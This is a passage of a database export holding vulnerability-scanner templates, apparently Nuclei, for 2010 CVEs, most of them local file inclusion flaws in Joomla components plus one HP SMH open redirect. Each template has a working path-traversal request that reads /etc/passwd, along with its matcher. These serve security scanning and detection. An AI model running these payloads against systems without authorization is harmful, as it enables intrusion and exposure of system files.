(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12145\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1478\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1478\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_jfeedback\n tags: cve,cve2010,joomla,lfi,edb,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f8a369f60457a7ad48ee08f06532f8ea4030fe25b2fe4d735fdfd1442f512d9c022100de537a9f67ca16a85f4b2b73a6f4acb836f318fa80b2cecbf785fd5d92651037:922c64590222798bb761d5b6d8e72950", "hash": "4c0892480b9a2f3a820434ede67edf36", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8d" }, "name": "CVE-2010-1491.yaml", "content": "id: CVE-2010-1491\n\ninfo:\n name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! 
CMS.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12318\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1491\n - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt\n - http://www.exploit-db.com/exploits/12318\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1491\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mms.pipp\n product: com_mmsblog\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,mms.pipp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e0a41e3ef2fff8d4281685f568b953c58721b3ae23726e41f4687da5de910e64022100bb7d92ae5fafc295c7b580db91dfab2e82e1d68946435e325a1e1d8bc6887978:922c64590222798bb761d5b6d8e72950", "hash": "ac2c225112b3b6d183b042ef683956d5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8e" }, "name": "CVE-2010-1494.yaml", "content": "id: CVE-2010-1494\n\ninfo:\n name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12113\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1494\n - http://www.exploit-db.com/exploits/12113\n - http://www.awdwall.com/index.php/awdwall-updates-logs-\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57693\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1494\n cwe-id: CWE-22\n epss-score: 0.01827\n epss-percentile: 0.86946\n cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: awdsolution\n product: com_awdwall\n tags: cve,cve2010,joomla,lfi,edb,awdsolution\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022078af0a2572ae5f8b2c1663f51eada15aaf88e88ddd86c86885239309dfc1cad3022004c0a80a0505a5b96aa016ae9b7c502555783290a05b5589d8a9677dcabefefe:922c64590222798bb761d5b6d8e72950", "hash": "f2d96647c3387a0c379b563b76173015", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8f" }, "name": "CVE-2010-1495.yaml", "content": "id: CVE-2010-1495\n\ninfo:\n name: Joomla! Component Matamko 1.01 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12286\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1495\n - http://www.vupen.com/english/advisories/2010/0929\n - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1495\n cwe-id: CWE-22\n epss-score: 0.04503\n epss-percentile: 0.92278\n cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: matamko\n product: com_matamko\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,matamko\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100db80873c4e826e771eec3d90cc217edd2052bb04999b81c92e730edfdd70ccee02204a0f81a67a7a8065fe6aa1db38bd12b03921b8796c10a8adbe1e151d35643bee:922c64590222798bb761d5b6d8e72950", "hash": "3b2598d45d3a646b909b3e06f59debcc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e90" }, "name": "CVE-2010-1531.yaml", "content": "id: CVE-2010-1531\n\ninfo:\n name: Joomla! Component redSHOP 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12054\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1531\n - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt\n - http://redcomponent.com/redshop/redshop-changelog\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57512\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1531\n cwe-id: CWE-22\n epss-score: 0.01815\n epss-percentile: 0.86892\n cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redcomponent\n product: com_redshop\n tags: cve2010,cve,lfi,edb,packetstorm,joomla,redcomponent\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e5477149f1e34b88e3dd7d962a23c967bc272e94ffeae18055a5a80d9e051cc602210086357c7ed36299ed6887410f4e2b5c11f76dc8fc2ad89d7197281be08c89e9e0:922c64590222798bb761d5b6d8e72950", "hash": "b684db0fb1ffb1c36ecd0403ffb2bd87", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e91" }, "name": "CVE-2010-1532.yaml", "content": "id: CVE-2010-1532\n\ninfo:\n name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12118\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1532\n - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1532\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: givesight\n product: com_powermail\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,givesight\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950", "hash": "d5ebaa36900233c5701b2ca5942f4f55", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e92" }, "name": "CVE-2010-1533.yaml", "content": "id: CVE-2010-1533\n\ninfo:\n name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12142\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1533\n - http://www.exploit-db.com/exploits/12142\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1533\n cwe-id: CWE-22\n epss-score: 0.00706\n epss-percentile: 0.79951\n cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: peter_hocherl\n product: com_tweetla\n tags: cve2010,cve,joomla,lfi,edb,peter_hocherl\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950", "hash": "b5d1ea9484b31f176f77ddf0eb8c57d1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e93" }, "name": "CVE-2010-1534.yaml", "content": "id: CVE-2010-1534\n\ninfo:\n name: Joomla! Component Shoutbox Pro - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n remediation: Upgrade to a supported version\n reference:\n - https://www.exploit-db.com/exploits/12067\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1534\n - http://www.exploit-db.com/exploits/12067\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1534\n cwe-id: CWE-22\n epss-score: 0.01385\n epss-percentile: 0.86058\n cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla.batjo\n product: com_shoutbox\n tags: cve2010,cve,joomla,lfi,edb,joomla.batjo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950", "hash": "96bea42c3ed03ccfd3d13a53539ab0c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e94" }, "name": "CVE-2010-1535.yaml", "content": "id: CVE-2010-1535\n\ninfo:\n name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! 
Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12151\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1535\n - http://www.exploit-db.com/exploits/12151\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1535\n cwe-id: CWE-22\n epss-score: 0.00706\n epss-percentile: 0.78254\n cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: peter_hocherl\n product: com_travelbook\n tags: cve,cve2010,joomla,lfi,edb,peter_hocherl\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950", "hash": "76533935820717f306135a5c54f154d9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e95" }, "name": "CVE-2010-1540.yaml", "content": "id: CVE-2010-1540\n\ninfo:\n name: Joomla! Component com_blog - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Joomla! 
to fix the directory traversal vulnerability in com_blog component.\n reference:\n - https://www.exploit-db.com/exploits/11625\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1540\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1540\n cwe-id: CWE-22\n epss-score: 0.0045\n epss-percentile: 0.72402\n cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: myblog\n product: com_myblog\n tags: cve2010,cve,joomla,lfi,edb,myblog\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100853ab92a94122428ef783d809d2344f7e06f86bf4da63122b22b0a1e3a0d6e8c022100c6d26c261af1b18db84a007d7cb10ecc069fd53aa90a15ccc8ce97c046c6ad2c:922c64590222798bb761d5b6d8e72950", "hash": "ccb46ba111bcd6099855cd36e852add0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e96" }, "name": "CVE-2010-1586.yaml", "content": "id: CVE-2010-1586\n\ninfo:\n name: HP System Management Homepage (SMH) v2.x.x.x - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.\n remediation: |\n Apply the latest patches or updates provided by HP to fix the open redirect vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586\n - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse\n - 
https://exchange.xforce.ibmcloud.com/vulnerabilities/58107\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-1586\n cwe-id: CWE-20\n epss-score: 0.00917\n epss-percentile: 0.81107\n cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: system_management_homepage\n tags: cve,cve2010,redirect,smh,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100f57a607443ab3d3afbecb32664f1d6143de739eaf0a9af290671f808ee175f33022100f241d17fa92db4be2755072bfe591fc4fe9d6dc10f24f02fecf152f383bc496f:922c64590222798bb761d5b6d8e72950", "hash": "5816de9f648fa3b25b2e9d685abb7975", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e97" }, "name": "CVE-2010-1601.yaml", "content": "id: CVE-2010-1601\n\ninfo:\n name: Joomla! Component JA Comment - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Joomla! 
Component JA Comment to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12236\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1601\n - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1601\n cwe-id: CWE-22\n epss-score: 0.01299\n epss-percentile: 0.84437\n cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamart\n product: com_jacomment\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210097b2518e36f765bf1859fe172670ecd77886665cb539f4379bb250f6b6984e6a02207707d1856286f12c7923bf67ba75f1dcc7cc704a1603b96a498ca5e75ed2dbb4:922c64590222798bb761d5b6d8e72950", "hash": "c5a022e0c6db0c092977202465119f7a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e98" }, "name": "CVE-2010-1602.yaml", "content": "id: CVE-2010-1602\n\ninfo:\n name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! 
Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12283\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1602\n - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt\n - http://www.vupen.com/english/advisories/2010/0932\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1602\n cwe-id: CWE-22\n epss-score: 0.03451\n epss-percentile: 0.91267\n cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zimbllc\n product: com_zimbcomment\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950", "hash": "003e13af87da41530d6ab2e122f614a1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e99" }, "name": "CVE-2010-1603.yaml", "content": "id: CVE-2010-1603\n\ninfo:\n name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12284\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1603\n - http://www.vupen.com/english/advisories/2010/0931\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1603\n cwe-id: CWE-22\n epss-score: 0.03451\n epss-percentile: 0.91267\n cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zimbllc\n product: com_zimbcore\n tags: cve,cve2010,joomla,lfi,edb,zimbllc\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022054c49fc7d9cd0665b02bdd1416c1510b1752a4f06b6591edf9975587dbd9f87102202a6ac32dc8f19d3831f4ecb72f8145c38a2992e9219593c3b2d5ad99f3f36663:922c64590222798bb761d5b6d8e72950", "hash": "9e799cc42ff0fa6075910f73c733ad93", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9a" }, "name": "CVE-2010-1607.yaml", "content": "id: CVE-2010-1607\n\ninfo:\n name: Joomla! Component WMI 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12316\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1607\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1607\n cwe-id: CWE-22\n epss-score: 0.01726\n epss-percentile: 0.87577\n cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: paysyspro\n product: com_wmi\n tags: cve,cve2010,joomla,lfi,edb,paysyspro\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950", "hash": "e7057d59a17172f322f3f4f2954fca47", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9b" }, "name": "CVE-2010-1653.yaml", "content": "id: CVE-2010-1653\n\ninfo:\n name: Joomla! Component Graphics 1.0.6 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation.\n remediation: |\n Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12430\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1653\n - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt\n - http://www.vupen.com/english/advisories/2010/1004\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1653\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.91355\n cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: htmlcoderhelper\n product: com_graphics\n tags: cve,cve2010,edb,packetstorm,joomla,lfi,htmlcoderhelper\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950", "hash": "65d1d5d89d703f53921baaa5a714b3d7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9c" }, "name": 